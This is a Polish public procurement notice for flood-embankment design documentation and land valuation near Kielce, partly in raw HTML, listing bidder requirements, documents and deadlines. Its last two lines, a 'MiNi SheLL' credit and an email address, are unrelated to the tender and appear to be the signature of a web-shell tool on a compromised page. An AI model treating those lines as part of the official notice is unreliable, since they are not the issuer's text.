A) Materiały niezbędne do wniosku o wydanie decyzji o pozwoleniu na realizację inwestycji, (w ilości wersja papierowa 6 egz. + wersja elektroniczna 1 egz. na nośniku DVD, pliki mapowe - pliki z rozszerzeniem pdf i dwg lub inne umożliwiające edycję), zgodnie z art. 6 ust.1 ustawy z dnia 8 lipca 2010r. o szczególnych zasadach przygotowania inwestycji w zakresie budowli przeciwpowodziowych (Dz.U. z 2010 r. Nr 143, poz. 963 z późn. zm.) zawierające:
1. charakterystykę inwestycji określającą rodzaj budowli przeciwpowodziowej oraz jej lokalizację i parametry techniczne,
2. mapę w skali co najmniej 1:10 000 przedstawiającą projektowany obszar inwestycji z zaznaczeniem podziału geodezyjnego nieruchomości oraz terenu niezbędnego dla obiektów budowlanych oraz istniejące uzbrojenie terenu, a także wskazanie części nieruchomości będących częścią inwestycji, na której nie będą prowadzone roboty budowlane,
3. analizę powiązania inwestycji z mapami zagrożenia powodziowego, mapami ryzyka powodziowego, z planami zarządzania ryzykiem powodziowym (o ile zostały opracowane),
4. określenie zmian w dotychczasowej infrastrukturze zagospodarowania terenu,
5. opinie właściwych organów wymienionych w art. 6 ust.1 pkt.7 a - l w/w ustawy,
6. wskazanie nieruchomości w stosunku do których decyzja o pozwoleniu na realizację inwestycji ma wywołać skutek o którym mowa w art. 19 ust.4 ustawy tj. zatwierdzenie podziału nieruchomości,
7. wskazanie nieruchomości, o których mowa w art. 9 pkt. 5 lit.b w/w ustawy tj. nieruchomości lub ich części będących częścią inwestycji, niezbędnych do jej funkcjonowania, które nie stają się własnością Skarbu państwa albo jednostki samorządu terytorialnego, ale wobec których trwale ogranicza się sposób korzystania.

Obowiązkiem Wykonawcy jest także wykonanie innych opracowań poza wszystkimi w/w (w zależności od warunków stawianych przez uzgadniających). Wykonawca zobowiązany jest także uzyskać decyzje o środowiskowych uwarunkowaniach oraz pozwolenie wodnoprawne, natychmiastowo uzupełniać wnioski, operaty itp. - na każde wezwanie organów udzielających pozwoleń i Zamawiającego, w celu uzyskania pozwoleń i decyzji administracyjnych.

Po podpisaniu umowy na przedmiotowe zamówienie, Wykonawca otrzyma niezbędne upoważnienie (pełnomocnictwo) do reprezentowania i występowania w imieniu Zamawiającego w sprawach dotyczących projektowania.

Do wykonawcy zamówienia należeć będzie uzyskanie wszystkich niezbędnych danych do projektowania, opracowanie dokumentacji, wykonanie pomiarów geodezyjnych, w razie potrzeby uzyskanie wszelkich niezbędnych zgód właścicieli działek na wycinkę drzew i krzewów i innych w razie potrzeby do uzyskania decyzji na realizację inwestycji.
W trakcie opracowania dokumentacji należy przeprowadzić reambulację projektu w terenie.

Zgodnie z art. 20 ust. 2 Prawa budowlanego projektant ma obowiązek zapewnić sprawdzenie projektu architektoniczno-budowlanego pod względem zgodności z przepisami, w tym techniczno - budowlanym i obowiązującymi normami przez osoby posiadające uprawnienia budowlane do projektowania bez ograniczeń w odpowiedniej specjalności lub przez rzeczoznawcę budowlanego. 
Projekt powinien zawierać klauzulę stwierdzającą kompletność opracowania i przydatność celowi, jakiemu ma służyć.
Projektant, a także sprawdzający do projektu budowlanego dołączają oświadczenie o sporządzeniu projektu budowlanego zgodnie z obowiązującymi przepisami oraz zasadami wiedzy technicznej.

Po przekazaniu Zamawiającemu kompletnej dokumentacji do dnia 30.10.2013r. wykonana zostanie opinia odnosząca się do zgodności wykonania w/w dokumentacji ze Specyfikacją Istotnych Warunków Zamówienia, a także z obowiązującymi przepisami po opracowaniu której zwołane zostanie posiedzenie ZOPI. Obowiązkiem Wykonawcy będzie wprowadzenie ewentualnych uzupełnień i poprawek  dokumentacji zgodnie z zaleceniami Zespołu Oceny Projektów Inwestycyjnych.
Zamawiający oczekuje ponadto, że wszelkie poprawki i uwagi wynikające z protokołu z posiedzenia ZOPI zostaną wprowadzone do projektu, a potwierdzeniem tego faktu będzie podpis koreferenta po naniesieniu poprawek (obowiązek uzyskania podpisu koreferenta leży po stronie Wykonawcy).

B). Operat szacunkowy wyceny nieruchomości gruntowych przeznaczonych do przeniesienia tytułu własności na rzecz Skarbu Państwa i wypłaty odszkodowań właścicielom nieruchomości -3 egz. 
Wyceny nieruchomości winny być sporządzone zgodnie z wymogami określonymi w:
-ustawie z dnia 8 lipca 2010r. o szczególnych zasadach przygotowania do realizacji inwestycji w zakresie budowli przeciwpowodziowych (Dz.U. 2010 Nr 143, poz. 963) zgodnie z wymogami art. 21;
- ustawie z dnia 21 sierpnia 1997 r. o gospodarce nieruchomościami (tekst jedn. Dz. U. z 2010 Nr 102, poz. 651 z późn. zm.),
- rozporządzeniu Rady Ministrów z dnia 21 września 2004 r. w sprawie wyceny nieruchomości i sporządzania operatu szacunkowego (Dz.U. Nr 207, poz. 2109 z późn. zm.)
- standardach zawodowych rzeczoznawców majątkowych Polskiej Federacji Stowarzyszeń Rzeczoznawców Majątkowych.
Integralną częścią operatu szacunkowego wyceny nieruchomości gruntowych będzie zestawienie wartości działek obejmujące następujące dane:
- liczba porządkowa,
- właściciel, władający i jego adres,
- bonitacja, użytek, klasa,
- nr działki,
- nr KW,
- powierzchnia działki,
- cena jednostkowa za 1m2,
- cena działki do wykupu.
1.2. Materiały pomocne przy opracowaniu przedmiotowej dokumentacji: 

- Koncepcja zabezpieczenia przeciwpowodziowego doliny Kanału Strumień - opracowanie Biura Studiów i Projektów Gospodarki Wodnej Rolnictwa BIPROMEL Sp. z o.o. (z 2006 r.) oraz aneks po ZOPI do w/w Koncepcji.
- Książka Obiektu Budowlanego;
- protokoły z przeglądów wałów;
- operaty powykonawcze.
- dokumentacja projektowa Ochrona przed powodzią rejonu Połańca poprzez rozbudowę i podwyższenie wałów rzeki Wisły i Czarnej Staszowskiej - obecnie opracowywana przez Sweco Hydroprojekt Kraków Sp. z o. o..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 71.32.20.00-1, 71.35.40.00-4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 16.12.2013.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wysokość wadium ustala się w kwocie 5 000,00 zł (słownie: pięć tysięcy zł 00/100)</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. Posiadania wiedzy i doświadczenia, w realizacji prac  odpowiadających przedmiotowi zamówienia tj.:
1.1. Wykonania w ciągu ostatnich trzech lat przed upływem terminu składania ofert, 
a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej dwóch usług polegających na sporządzeniu dokumentacji na przebudowę, rozbudowę lub budowę wałów przeciwpowodziowych (minimum klasy III). Łączna wartość usług nie może być mniejsza niż 200 000,00 zł brutto.
Na potwierdzenie spełnienia warunku należy złożyć poniższe dokumenty: 2. Dokumentami potwierdzającymi spełnianie warunku, o którym mowa w powyższym punkcie muszą być:
2.1. Sporządzony przez Wykonawcę wykaz usług o których mowa w ppkt 1.1. we wzorze stanowiącym załącznik nr 2 do SIWZ. W wykazie tym należy potwierdzić spełnienie wymagań określonych w ppkt. 1. W przypadku składania oferty przez Wykonawców występujących wspólnie warunek ten może spełnić, dowolny z Wykonawców występujących wspólnie lub może być spełniony łącznie. Wymagana forma dokumentów oryginał. 
2.2. Dowody (poświadczenia) potwierdzające, że usługi przedstawione w wykazie  zrealizowanych usług zostały wykonane należycie. Wymagana forma dokumentów oryginał lub kopia poświadczona za zgodność z oryginałem przez Wykonawcę lub upoważnionego pełnomocnika</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. Dysponowania odpowiednim potencjałem technicznym i osobami zdolnymi do wykonania zamówienia - tj. 1.1. Co najmniej jedną osobą na stanowisku projektanta posiadającą uprawnienia projektowe  o specjalności konstrukcyjno-budowlanej i specjalizacji techniczno-budowlanej do projektowania w zakresie: obiektów budowlanych melioracji wodnych lub śródlądowych budowli hydrotechnicznych lub odpowiadające im równoważne uprawnienia wydane na podstawie wcześniejszych przepisów, która posiada doświadczenie niezbędne do wykonania zamówienia - tj. jako projektant  wykonała co najmniej dwie dokumentacje projektowe na przebudowę, rozbudowę lub budowę wałów przeciwpowodziowych (minimum klasy III) o łącznej wartości co najmniej 200 tys. zł brutto.
Na potwierdzenie spełnienia powyższych warunków należy złożyć poniższe dokumenty: 2. Dokumentami potwierdzającymi spełnianie warunku, o którym mowa w powyższym punkcie muszą być: 
2.1. Wykaz osób które będą uczestniczyć w wykonaniu zamówienia, spełniających wymagania określone w ppkt. 1.1. we wzorze stanowiącym załącznik nr 3 do SIWZ wraz z informacją o sposobie dysponowania tymi osobami. W przypadku składania oferty przez Wykonawców występujących wspólnie warunek ten może spełnić, dowolny z Wykonawców występujących wspólnie lub może być spełniony łącznie. Wymagana forma dokumentu - oryginał, 2.2. Do wykazu należy załączyć oświadczenie, że osoby, które będą uczestniczyć w wykonaniu zamówienia posiadają uprawnienia wymagane prawem - według wzoru stanowiącego załącznik nr 4 do SIWZ.  Wymagana forma dokumentu - oryginał.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Inne dokumenty wymagane w postępowaniu przez Zamawiającego: 

1.1. Wypełniony formularz ofertowy wg wzoru określonego w załączniku nr 1 do SIWZ     Wymagana forma dokumentu - oryginał.

1.2. Oświadczenie z art. 36 ust. 4 ustawy we wzorze określonym w załączniku nr 5 do SIWZ. Wymagana forma dokumentu - oryginał.

1.3. Pełnomocnictwo - jeżeli upoważnienie do podpisania oferty nie wynika wprost z dokumentu stwierdzającego status prawny Wykonawcy - nie dotyczy pełnomocnictwa w zakresie oferty Wykonawców wspólnie ubiegających się o zamówienie. Wymagana forma dokumentu oryginał lub kserokopia poświadczona notarialnie. 

1.4. Pełnomocnictwo w przypadku oferty Wykonawców występujących wspólnie o udzielenie zamówienia, o którym mowa w rozdz. IX SIWZ. Forma dokumentu oryginał lub kopia poświadczona notarialnie.

1.5. W przypadku prowadzenia działalności w formie spółki cywilnej gdy jest więcej niż jeden przedsiębiorca (wspólnik) należy do oferty załączyć kserokopię umowy spółki poświadczoną za zgodność z oryginałem przez wszystkich wspólników lub pełnomocnika ( wspólnika) umocowanego do takiej czynności. Warunek nie ma zastosowania w odniesieniu do spółek jawnych w przypadku załączenia do oferty aktualnego odpisu z właściwego rejestru - Krajowego Rejestru Sądowego, jeżeli ujawniono w nim wspólników spółki, oraz sposób reprezentowania spółki (składania oświadczeń woli).

1.6. W przypadku  wykonywania dyspozycji pkt. 5 rozdz. VII SIWZ, czyli w sytuacji kiedy Wykonawca wykazując spełnianie warunków, udziału w postępowaniu, o których mowa w art. 22 ust. 1 ustawy polega na zasobach innych podmiotów na zasadach określonych w art. 26 ust. 2b ustawy Wykonawca w celu udowodnienia Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, załącza do oferty:

1.6.1. pisemne zobowiązanie  podmiotów  do oddania Wykonawcy przez dany podmiot(y) do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia. 

1.6.2. dokumenty, o których mowa w par. 1 ust. 6 pkt 2  Rozporządzenia Prezesa Rady Ministrów z dnia 19 lutego 2013 r. w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy, oraz form, w jakich te dokumenty mogą być składane (Dz.U. 2013 nr 0 poz. 231) 
- Jeżeli zobowiązanie, o którym mowa w pkt. 1.6.1. w swojej treści wyczerpuje wszelkie przesłanki, o których mowa w par. 1, ust. 6, pkt 2 Rozporządzenia Prezesa Rady Ministrów z dnia 19 lutego 2013 r. w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy, oraz form, w jakich te dokumenty mogą być składane (Dz.U. 2013 nr 0 poz. 231) Wykonawca nie jest zobowiązany do przedkładania dokumentów, 
o którym mowa w pkt. 1.6.2.
1.7. Stosownie do art. 26 ust. 2d ustawy, listę podmiotów należących do tej samej grupy kapitałowej, o której mowa w art. 24 ust. 2 pkt 5 ustawy, albo informację o tym, że Wykonawca nie należy do grupy kapitałowej - wg  wzoru określonego w załączniku nr 10 do SIWZ. Wymagana forma dokumentu - oryginał. 
W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia dokument ten składa każdy z Wykonawców osobno.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zamawiający dopuszcza możliwość dokonania zmian postanowień zawartej umowy:

­- na warunkach §13 wzoru umowy stanowiącej załącznik nr 8 do SIWZ</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.szmiuw.kielce.com.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Świętokrzyski Zarząd Melioracji i Urządzeń Wodnych w Kielcach, ul. Witosa 86, pok. 209.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 07.05.2013 godzina 10:00, miejsce: Świętokrzyski Zarząd Melioracji i Urządzeń Wodnych w Kielcach, ul. Witosa 86, pok. 217 (sekretariat).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com